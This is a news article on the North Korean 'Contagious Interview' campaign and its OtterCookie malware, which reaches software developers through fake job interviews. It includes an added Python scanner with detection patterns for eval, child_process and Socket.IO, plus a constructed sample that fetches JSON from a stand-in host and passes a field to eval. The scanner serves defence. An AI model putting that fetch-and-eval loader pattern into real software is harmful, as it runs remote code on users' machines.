
North Korean hackers target new malware at software developers


A North Korean hacker campaign, “Contagious Interview,” targets software developers with fake job postings in order to install malware such as BeaverTail and InvisibleFerret. The malware has been active since at least December 2022, according to researchers from cybersecurity firm Palo Alto Networks.

A report by NTT Security Japan states that the Contagious Interview operation uses a new type of malware, called OtterCookie. This malware was likely introduced in September. A new variant of it was found by researchers in November “in the wild”.

OtterCookie attack chain

Similar to attacks documented by researchers at Palo Alto Networks’ Unit42, OtterCookie is delivered via a loader that retrieves JSON data and executes the “cookie” property as JavaScript code.

According to NTT, BeaverTail remains the most common payload, but OtterCookie is sometimes deployed along with BeaverTail. The loader infects targets via Node.js projects or npm packages downloaded from GitHub or Bitbucket. Recently, however, files built as Qt or Electron applications have also been used.

Once OtterCookie is active on the target device, it establishes secure communication links to its Command and Control (C2) infrastructure via the Socket.IO WebSocket tool and waits for commands.
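The loader shape described above (remote JSON fetched, one property handed to a JavaScript execution sink, Socket.IO used for C2) lends itself to a simple pre-run check a developer can apply to a project downloaded from a job “interview”. The following scanner is an added example written for this page, not code from NTT or Unit42; the sample project, its file names and the `example.invalid` URL are constructed.

```python
import re

# Indicator patterns for the loader shape described in the article: code that
# fetches remote JSON and passes one of its fields to a JavaScript execution sink,
# plus the Socket.IO client the article names as the C2 channel.
NETWORK = [r"\bfetch\s*\(", r"\baxios\.", r"\bhttps?\.(?:get|request)\s*\(", r"\bXMLHttpRequest\b"]
EXEC_SINKS = [r"\beval\s*\(", r"\bnew\s+Function\s*\(", r"\bvm\.runIn\w+Context\s*\(", r"\bchild_process\b"]
C2_LIBS = [r"socket\.io-client", r"\bio\s*\(\s*['\"]wss?://"]
# A field of a parsed object fed straight into eval/Function, e.g. eval(data.cookie).
FIELD_TO_EVAL = re.compile(r"\b(?:eval|Function)\s*\(\s*\w+(?:\.\w+|\[['\"][^'\"]+['\"]\])")

def scan_source(src: str) -> dict:
    """Return the indicators found in one JavaScript source file and a verdict."""
    found = {
        "network": [p for p in NETWORK if re.search(p, src)],
        "exec_sink": [p for p in EXEC_SINKS if re.search(p, src)],
        "c2_lib": [p for p in C2_LIBS if re.search(p, src)],
        "field_to_eval": bool(FIELD_TO_EVAL.search(src)),
    }
    # Any single indicator is common in legitimate code; a network fetch combined
    # with a dynamic-execution sink in the same file is what warrants manual review.
    if found["field_to_eval"] or (found["network"] and found["exec_sink"]):
        found["verdict"] = "review"
    elif found["exec_sink"] or found["c2_lib"]:
        found["verdict"] = "note"
    else:
        found["verdict"] = "clean"
    return found

def scan_project(files: dict) -> dict:
    """Scan a {path: source} mapping and return a verdict per file."""
    return {path: scan_source(src)["verdict"] for path, src in files.items()}

# Constructed sample project (not real malware): one file shows the described
# loader shape, the other two are ordinary application code.
SAMPLE_PROJECT = {
    "src/app.js": "const express = require('express');\nconst app = express();\napp.listen(3000);\n",
    "src/config.js": "module.exports = JSON.parse(require('fs').readFileSync('cfg.json'));\n",
    "lib/helper.js": (
        "const axios = require('axios');\n"
        "axios.get('https://example.invalid/api').then(r => {\n"
        "  const data = r.data;\n"
        "  eval(data.cookie);\n"
        "});\n"
    ),
}

if __name__ == "__main__":
    for path, verdict in scan_project(SAMPLE_PROJECT).items():
        print(f"{verdict:6}  {path}")
```

Run it over the `.js` files of a project before executing anything from it; a “review” verdict is a reason to read that file by hand, not proof of compromise.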

The researchers observed shell commands aimed at data theft, such as collecting keys from crypto wallets, documents, images and other valuable information. “The September version of OtterCookie already had built-in functionalities to steal keys from crypto wallets,” NTT explained. “For example, the checkForSensitiveData function used regular expressions to search for private Ethereum keys.” The researchers noted that this was modified in the November variant of the malware to be executed via external shell commands.

The latest version of OtterCookie can also exfiltrate data from the target device’s clipboard, which may contain sensitive information.

Frequently used reconnaissance commands, such as “ls” and “cat,” were detected, indicating that the attackers are trying to explore and prepare the environment for deeper infiltration or lateral movement.

New techniques

The emergence of new malware and the diversification of infection methods show that the threat actors behind the Contagious Interview campaign are experimenting with new tactics.

Software developers are advised to verify information about potential employers and be careful when running code on personal or work computers.
